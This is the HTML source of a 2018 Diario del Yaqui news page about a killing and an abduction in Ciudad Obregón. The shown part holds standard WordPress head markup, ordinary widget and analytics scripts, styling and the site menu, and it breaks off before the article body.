<!DOCTYPE html>
    <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="es-ES"><![endif]-->
    <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8" lang="es-ES"><![endif]-->
    <!--[if IE 8]><html class="no-js lt-ie9" lang="es-ES"><![endif]-->
    <!--[if gt IE 8]><!--><html class="no-js" lang="es-ES"><!--<![endif]-->
<head><meta itemprop="image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg">
<meta property="og:image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg"/>
<meta name="twitter:image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg" />
<meta charset="UTF-8" />
<meta name="description" content="Por: Ricardo López

A las 3:20 horas de este lunes fue localizado al interior de un domicilio de la calle 26 y la avenida B y C una persona si" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Asesinan a uno y “levantan” a otro | Diario del Yaqui | El periódico que se lee más...</title>
          <script src="/cdn-cgi/apps/head/naDW1_iZYeY0TKyPPX0eDBlUTB8.js"></script><script>
            (function(d){
              var js, id = 'powr-js', ref = d.getElementsByTagName('script')[0];
              if (d.getElementById(id)) {return;}
              js = d.createElement('script'); js.id = id; js.async = true;
              js.src = '//www.powr.io/powr.js';
              js.setAttribute('powr-token','rqms4ia2FK1485200023');
              js.setAttribute('external-type','wordpress');
              ref.parentNode.insertBefore(js, ref);
            }(document));
          </script>
          <link rel='dns-prefetch' href='//diariodelyaqui.mx' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//w.sharethis.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Diario del Yaqui | El periódico que se lee más... &raquo; Feed" href="http://diariodelyaqui.mx/feed/" />
<link rel="alternate" type="application/rss+xml" title="Diario del Yaqui | El periódico que se lee más... &raquo; RSS de los comentarios" href="http://diariodelyaqui.mx/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Diario del Yaqui | El periódico que se lee más... &raquo; Asesinan a uno y “levantan” a otro RSS de los comentarios" href="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/diariodelyaqui.mx\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.6"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='stylish_popular_posts_style-css'  href='http://diariodelyaqui.mx/wp-content/plugins/stylish-popular-posts/css/style.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://diariodelyaqui.mx/wp-includes/css/dashicons.min.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='admin-bar-css'  href='http://diariodelyaqui.mx/wp-includes/css/admin-bar.min.css?ver=4.9.6' type='text/css' media='all' />
<style id='admin-bar-inline-css' type='text/css'>
.goog-te-banner-frame { top:32px !important }
</style>
<link rel='stylesheet' id='bp-admin-bar-css'  href='http://diariodelyaqui.mx/wp-content/plugins/buddypress/bp-core/css/admin-bar.min.css?ver=2.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='easy-facebook-likebox-plugin-styles-css'  href='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/css/public.css?ver=4.3.5' type='text/css' media='all' />
<link rel='stylesheet' id='easy-facebook-likebox-font-awesome-css'  href='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/css/font-awesome.css?ver=4.3.5' type='text/css' media='all' />
<link rel='stylesheet' id='easy-facebook-likebox-animate-css'  href='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/css/animate.css?ver=4.3.5' type='text/css' media='all' />
<link rel='stylesheet' id='easy-facebook-likebox-popup-styles-css'  href='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/popup/magnific-popup.css?ver=4.3.5' type='text/css' media='all' />
<link rel='stylesheet' id='radium_html5_media_styles-css'  href='http://diariodelyaqui.mx/wp-content/plugins/radium-html5-media/assets/css/style.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://diariodelyaqui.mx/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.2.5.1' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='ssbp_styles-css'  href='http://diariodelyaqui.mx/wp-content/plugins/simple-share-buttons-plus/ssbp.min.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='video-central-player-style-css'  href='http://diariodelyaqui.mx/wp-content/plugins/video-central/assets/frontend/css/video-js.css?ver=1.2.3' type='text/css' media='all' />
<link rel='stylesheet' id='video-central-style-css'  href='http://diariodelyaqui.mx/wp-content/plugins/video-central/templates/default/css/style.css?ver=1.2.3' type='text/css' media='screen' />
<link rel='stylesheet' id='spu-public-css-css'  href='http://diariodelyaqui.mx/wp-content/plugins/popups/public/assets/css/public.css?ver=1.9.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='theme-google-fonts-css'  href='//fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700%7CLato%3A100%2C300%2C400%2C700%2C900%2C100italic%2C300italic%2C400italic%2C700italic%2C900italic&#038;ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='framework-style-css'  href='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/css/style.min.css?ver=1.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='theme-print-css'  href='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/css/print.min.css?ver=1.9.3' type='text/css' media='print' />
<link rel='stylesheet' id='theme-mobile-css'  href='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/css/mobile.min.css?ver=1.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='radium-buddypress-css'  href='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/css/buddypress.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='gallery_plus-css'  href='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/galleria/themes/classic/galleria.classic.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-css'  href='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/css/jquery.fancybox.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='fancyboxthumbs-css'  href='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/css/jquery.fancybox-thumbs.css?ver=4.9.6' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://diariodelyaqui.mx/wp-content/plugins/jetpack/css/jetpack.css?ver=5.0' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var radium_script = {"post_id":"104501","ajaxurl":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var BP_Confirm = {"are_you_sure":"\u00bfEst\u00e1s seguro?"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/buddypress/bp-core/js/confirm.min.js?ver=2.9.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/popup/jquery.magnific-popup.min.js?ver=4.3.5'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/js/jquery.cookie.js?ver=4.3.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var public_ajax = {"ajax_url":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php"};
var public_ajax = {"ajax_url":"http:\/\/diariodelyaqui.mx\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/easy-facebook-likebox/public/assets/js/public.js?ver=4.3.5'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.2.5.1'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.2.5.1'></script>
<script id='st_insights_js'type='text/javascript' src='http://w.sharethis.com/button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&#038;product=simple-share-pro'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/modernizr.min.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/buddypress/bp-core/js/jquery-query.min.js?ver=2.9.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/buddypress/bp-core/js/vendor/jquery-cookie.min.js?ver=2.9.4'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/js/jquery.fancybox.js?ver=4.9.6'></script>
<script type='text/javascript' src='http://diariodelyaqui.mx/wp-content/plugins/radium-galleries-lite/assets/frontend/js/jquery.fancybox-thumbs.js?ver=4.9.6'></script>
<link rel='https://api.w.org/' href='http://diariodelyaqui.mx/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://diariodelyaqui.mx/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://diariodelyaqui.mx/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.6" />
<link rel="canonical" href="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" />
<link rel='shortlink' href='http://wp.me/p7WoL8-rbv' />
<link rel="alternate" type="application/json+oembed" href="http://diariodelyaqui.mx/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fdiariodelyaqui.mx%2Fasesinan-a-uno-y-levantan-a-otro%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://diariodelyaqui.mx/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fdiariodelyaqui.mx%2Fasesinan-a-uno-y-levantan-a-otro%2F&#038;format=xml" />

	<script type="text/javascript">var ajaxurl = 'http://diariodelyaqui.mx/wp-admin/admin-ajax.php';</script>


<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style>    <script type="text/javascript">window.paceOptions = { elements: { selectors: ['#header' ] } }</script>
    <script src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/js/pace.min.js"></script><link rel="shortcut icon" href="http://159.203.243.213/wp-content/uploads/2017/01/favi.jpg" type="image/x-icon" />
<link rel="apple-touch-icon" href="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/apple-touch-icon.png"/>
<link rel="pingback" href="http://diariodelyaqui.mx/xmlrpc.php" />
<script>  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-56604316-1', 'auto');
  ga('send', 'pageview');</script>		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		<style type="text/css" media="print">#wpadminbar { display:none; }</style>
<style type="text/css" media="screen">
	html { margin-top: 32px !important; }
	* html body { margin-top: 32px !important; }
	@media screen and ( max-width: 782px ) {
		html { margin-top: 46px !important; }
		* html body { margin-top: 46px !important; }
	}
</style>
<meta name="generator" content="Powered by Slider Revolution 5.2.5.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Asesinan a uno y “levantan” a otro" />
<meta property="og:url" content="http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/" />
<meta property="og:description" content="Por: Ricardo López A las 3:20 horas de este lunes fue localizado al interior de un domicilio de la calle 26 y la avenida B y C una persona sin vida después de reportar la detonación de varias armas…" />
<meta property="article:published_time" content="2018-05-29T06:27:27+00:00" />
<meta property="article:modified_time" content="2018-05-29T06:27:27+00:00" />
<meta property="og:site_name" content="Diario del Yaqui | El periódico que se lee más..." />
<meta property="og:image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg" />
<meta property="og:image:width" content="877" />
<meta property="og:image:height" content="451" />
<meta property="og:locale" content="es_ES" />
<meta name="twitter:image" content="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<style>
.pace {
  -webkit-pointer-events: none;
  pointer-events: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  user-select: none;
}

.pace-inactive {
  display: none;
}

.pace .pace-progress {
  background: #ff5a00;
  position: fixed;
  z-index: 2000;
  top: 0;
  left: 0;
  height: 2px;

  -webkit-transition: width 1s;
  -moz-transition: width 1s;
  -o-transition: width 1s;
  transition: width 1s;
}

.pace .pace-progress-inner {
  display: block;
  position: absolute;
  right: 0px;
  width: 100px;
  height: 100%;
  box-shadow: 0 0 10px #ff5a00, 0 0 5px #ff5a00;
  opacity: 1.0;
  -webkit-transform: rotate(3deg) translate(0px, -4px);
  -moz-transform: rotate(3deg) translate(0px, -4px);
  -ms-transform: rotate(3deg) translate(0px, -4px);
  -o-transform: rotate(3deg) translate(0px, -4px);
  transform: rotate(3deg) translate(0px, -4px);
}

.pace .pace-activity {
  display: block;
  position: fixed;
  z-index: 2000;
  top: 15px;
  right: 15px;
  width: 14px;
  height: 14px;
  border: solid 2px transparent;
  border-top-color: #ff5a00;
  border-left-color: #ff5a00;
  border-radius: 10px;
  -webkit-animation: pace-spinner 400ms linear infinite;
  -moz-animation: pace-spinner 400ms linear infinite;
  -ms-animation: pace-spinner 400ms linear infinite;
  -o-animation: pace-spinner 400ms linear infinite;
  animation: pace-spinner 400ms linear infinite;
}

@-webkit-keyframes pace-spinner {
  0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); transform: rotate(360deg); }
}
@-moz-keyframes pace-spinner {
  0% { -moz-transform: rotate(0deg); transform: rotate(0deg); }
  100% { -moz-transform: rotate(360deg); transform: rotate(360deg); }
}
@-o-keyframes pace-spinner {
  0% { -o-transform: rotate(0deg); transform: rotate(0deg); }
  100% { -o-transform: rotate(360deg); transform: rotate(360deg); }
}
@-ms-keyframes pace-spinner {
  0% { -ms-transform: rotate(0deg); transform: rotate(0deg); }
  100% { -ms-transform: rotate(360deg); transform: rotate(360deg); }
}
@keyframes pace-spinner {
  0% { transform: rotate(0deg); transform: rotate(0deg); }
  100% { transform: rotate(360deg); transform: rotate(360deg); }
}
html { background-color: transparent; }

body.boxed,
body.narrow {background-image: url(http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/patterns/cubes.png); background-repaeat:repeat;}@media only screen and (min-width: 768px){
#main-menu .menu-item-object-category.has-cat-megamenu .sub-mega-wrap:not(.single-cat) .sub-menu>li>a, #main-menu .menu-item-object-video_category.has-cat-megamenu .sub-mega-wrap:not(.single-cat) .sub-menu>li>a {
    text-transform: none;
}
}

@media only screen and (min-width: 768px){
.main_menu>ul>li>ul li a {
    font-size: 13px;
}
}

@media only screen and (min-width: 1021px){
#columnistas{
  min-height:450px;
}
}

@media only screen and (min-width: 797px) and (max-width: 1021px){
#columnistas{
  min-height:1000px;
}
}

@media only screen and (min-width: 700px) and (max-width: 797px){
#columnistas{
  min-height:1010px;
}
}

@media only screen and (min-width: 547px) and (max-width: 700px){
#columnistas{
  min-height:950px;
}
}

@media only screen and (min-width: 450px) and (max-width: 547px){
#columnistas{
  min-height:2451px;
}
}

@media only screen and (min-width: 400px) and (max-width: 450px){
#columnistas{
  min-height:2107px;
}
}

@media only screen and (min-width: 330px) and (max-width: 400px){
#columnistas{
  min-height:1940px;
}
}

@media only screen and (min-width: 300px) and (max-width: 330px){
#columnistas{
  min-height:1720px;
}
}

.widget .widget-title{
background:black;
}

.widget .widget-title span {
    background-color: black;
    padding: 0 15px;
    color: white;
}

.breaking-banner .story {
    background-color: #d7d7d7;
}

.breaking-banner .story-h a {
    color: black;
}

.breaking-banner .meta-bar-title:after {
    right: -48px;
    border-left-color: #830e0e;
}

.breaking-banner .meta-bar-title {
    background-color: #830e0e;
}
</style>
<style></style><style>html, body {}h1, h2, h3, h4, h5, h6, .main_menu>ul>li>a, .main_menu>ul>li>a strong, #bottom-footer #footer-menu ul li a, .nav-tabs>li a, #colophon #theme-credits, .top-news .number, #main-menu .menu-item-object-category .sub-mega-wrap>ul>li .subcat-title, .widget_radium_post_tabs .tab-hold #tabs>li, .breadcrumb, .widget_radium_social_fans, #header .site-navigation .search-form .container input[type=text], #main-menu .menu-item-object-category.has-cat-megamenu .sub-mega-wrap>ul .subcat-title, .site-header-toolbar .menu.right>li>a, .site-header-toolbar .top-menu>li>a, #main-menu .menu-item-object-category.has-cat-megamenu .sub-mega-wrap:not(.single-cat) .sub-menu>li>a, .main_menu>ul>li>a, .main_menu>ul>li>a .menu-title-outer, .single .post-side-share .title, .video-central-nav-tabs>li, .site-header-toolbar .bag-header, #header .site-id, #header .site-id a, .fallback_menu .radium_mega>li>a, .buddypress div.item-list-tabs ul li a, .buddypress div.item-list-tabs ul li span, .buddypress div.item-list-tabs ul li a, .buddypress div.item-list-tabs ul li span, .buddypress div.poster-meta, .buddypress .item-list .activity-content .activity-header, .buddypress .item-list .activity-content .comment-header, .widget .swa-activity-list .swa-activity-content .swa-activity-header, .widget .swa-activity-list .swa-activity-content .comment-header, .buddypress div.activity-comments div.acomment-meta, .widget div.swa-activity-comments div.acomment-meta, li.bbp-forum-info, li.bbp-topic-title, #bbpress-forums li.bbp-header, #bbpress-forums fieldset.bbp-form legend, form label {}</style>			<style type="text/css" id="wp-custom-css">
				#wpadminbar{visibility:hidden;}			</style>
		</head>
<body class="video-central-newscore video-central bp-legacy post-template-default single single-post postid-104501 single-format-standard admin-bar no-customize-support safari singular group-blog boxed skin-default header-style-default custom-bg right-sidebar with-sidebar hide-featured-area" itemscope="itemscope" itemtype="http://schema.org/WebPage">

    
    <div id="theme-wrapper">
    	<div id="theme-wrapper-inner">
	    <div id="handheld-menu-holder"></div><!-- hidden --><header id="header" class="has-news has-search has-random has-trending logo-left" role="banner" itemscope="itemscope" itemtype="http://schema.org/WPHeader">

        
        
        <div class="site-header-toolbar">

            <div class="row">

                <div class="large-7 columns"> 
				<ul id="menu-top-menu" class="top-menu"><li id="menu-item-71544" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-first menu-item-71544"><a href="http://diariodelyaqui.mx/directorio/">Directorio</a></li>
<li id="menu-item-4226" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-4226"><a href="http://diariodelyaqui.mx/mision/">Misión</a></li>
<li id="menu-item-4217" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-4217"><a href="http://diariodelyaqui.mx/vision/">Visión</a></li>
<li id="menu-item-4228" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-4228"><a href="http://diariodelyaqui.mx/valores/">Valores</a></li>
<li id="menu-item-3908" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-3908"><a href="http://diariodelyaqui.mx/filosofia/">Filosofía</a></li>
<li id="menu-item-6266" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-last menu-item-6266"><a href="http://www.diariodelyaqui.mx/2017/01/23/contacto/">Contacto</a></li>
</ul>    <div class="header-tools">
                <ul class="menu right">
                                                        </ul>
            </div><!-- END .entry-meta -->
    
                </div><!-- END .large-12 .columns -->
                <div class="large-5 columns" style=" padding-top: 7px; color: white; ">
                Cd. Obregón Sonora. Lunes 28 de Mayo de 2018                </div>

            </div><!-- END .row -->

        </div><!-- .site-header-toolbar -->

        
        <div class="row">

            <div class="large-12 columns">

                <div class="site-id mobile-four clearfix">

                    <div class="site-title-wrapper" itemprop="headline"><a href="http://diariodelyaqui.mx/" title="Diario del Yaqui | El periódico que se lee más..." rel="home"><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/motoson-16.jpg" class="logo" alt="logo" width="500"  height="90"  /></a></div>
                    
                </div><!-- END .site-id -->

                
                <div class="site-header-banner mobile-four clearfix">

                    <a href="" rel="nofollow"><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/banner-what.jpg" alt="banner"  width="728" height="90" /></a>
                </div><!-- END .site-header-banner -->

                
            </div><!-- END .large-12 .columns -->

        </div><!-- END .row -->

        <div class="site-navigation mobile-four">

            <div class="row">

                <div class="large-12 columns">

                    
    <div id="header-nav-extras">

        
        <div id="header-search" class="bg-icon-search-white">
            <a class="search-remove" href="#" title="Buscar"></a>
        </div><!-- .header-search -->

   <div id="header-random" class="bg-icon-random-white">
            <a href="http://diariodelyaqui.mx/?random=1" class="random-article icon-shuffle ttip" title="Random"></a>
        </div><!-- .header-random -->
   
        <div class="ribbon-shadow-right bg-ribbon-shadow-right"></div>

    </div><!-- .header-nav-extras -->

           <!--animated search form -->
        <div class="search-form">
            <div class="row-background full-width"></div>
            <div class="container">
                <form method="get" class="form-search" action="http://diariodelyaqui.mx">
                    <button class="submit" name="submit" id="searchsubmit">Search<i></i></button>
                    <div class="search-query-wrapper"><input type="text" class="field search-query" name="s" value="" id="s" placeholder="Búsqueda..." autocomplete="off" />
                    </div>
                </form>
            </div>
        </div>
        <!-- End search form -->
    
		<!-- Main Navigation -->
		<nav class="nav-primary" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation">
			<div id="main-menu" class="main_menu clearfix">
				<button class="menu-trigger show-on-small">Open Menu</button>
				<ul id="menu-menu-principal" class="radium_mega menu dl-menu"><li id="menu-item-76187" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first has-one-col-dropdown" itemprop="name"><a href="http://diariodelyaqui.mx/" itemprop="name"><span class="menu-title-outer"><span class="menu-title">Inicio</span></span></a></li>
<li id="menu-item-76189" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item has-cat-megamenu color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/" itemprop="name"><span class="menu-title-outer"><span class="menu-title">Secciones</span></span></a><div class="sub-mega-wrap radium-mega-div">



<ul class="sub-menu">
	<li id="menu-item-76190" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/agricola/" itemprop="name"><span class="menu-title">Agrícola</span></a></li>
	<li id="menu-item-76191" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/obregon/" itemprop="name"><span class="menu-title">Obregón</span></a></li>
	<li id="menu-item-76192" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/finanzas/" itemprop="name"><span class="menu-title">Finanzas</span></a></li>
	<li id="menu-item-76193" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/estatal/" itemprop="name"><span class="menu-title">Estatal</span></a></li>
	<li id="menu-item-76194" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/espectaculos/" itemprop="name"><span class="menu-title">Espectaculos</span></a></li>
	<li id="menu-item-76195" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/sociales/" itemprop="name"><span class="menu-title">Sociales</span></a></li>
	<li id="menu-item-76196" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/global/" itemprop="name"><span class="menu-title">Global</span></a></li>
	<li id="menu-item-76197" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/nacional/" itemprop="name"><span class="menu-title">Nacional</span></a></li>
	<li id="menu-item-76198" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/pasion/" itemprop="name"><span class="menu-title">Pasión</span></a></li>
	<li id="menu-item-76199" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/policiaca/" itemprop="name"><span class="menu-title">Policiaca</span></a></li>
	<li id="menu-item-76200" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/principal/" itemprop="name"><span class="menu-title">Principal</span></a></li>
	<li id="menu-item-76201" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/quehacer-cultural/" itemprop="name"><span class="menu-title">Quehacer Cultural</span></a></li>
	<li id="menu-item-76202" class="menu-item menu-item-type-taxonomy menu-item-object-category color-none" itemprop="name"><a href="http://diariodelyaqui.mx/categoria/secciones/region-mayo/" itemprop="name"><span class="menu-title">Región Mayo</span></a></li>
</ul>
<ul class='subcat sub-cat-list'><li id='cat-latest-76190' class='active cat-latest-76190'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76190' data-child_object_id='47'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/concluye-cosecha-de-trigo-en-grupo-ucaivysa/' title='Concluye cosecha de trigo en Grupo Ucaivysa'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/rtrert-3-250x140.jpg" alt="Concluye cosecha de trigo en Grupo Ucaivysa" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 4 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/concluye-cosecha-de-trigo-en-grupo-ucaivysa/' title='Concluye cosecha de trigo en Grupo Ucaivysa'>Concluye cosecha de trigo en Grupo Ucaivysa</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/regadas-cuatro-mil-hectareas-de-soya/' title='Regadas cuatro mil hectáreas de soya'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/rtrert-2-250x140.jpg" alt="Regadas cuatro mil hectáreas de soya" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 4 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/regadas-cuatro-mil-hectareas-de-soya/' title='Regadas cuatro mil hectáreas de soya'>Regadas cuatro mil hectáreas de 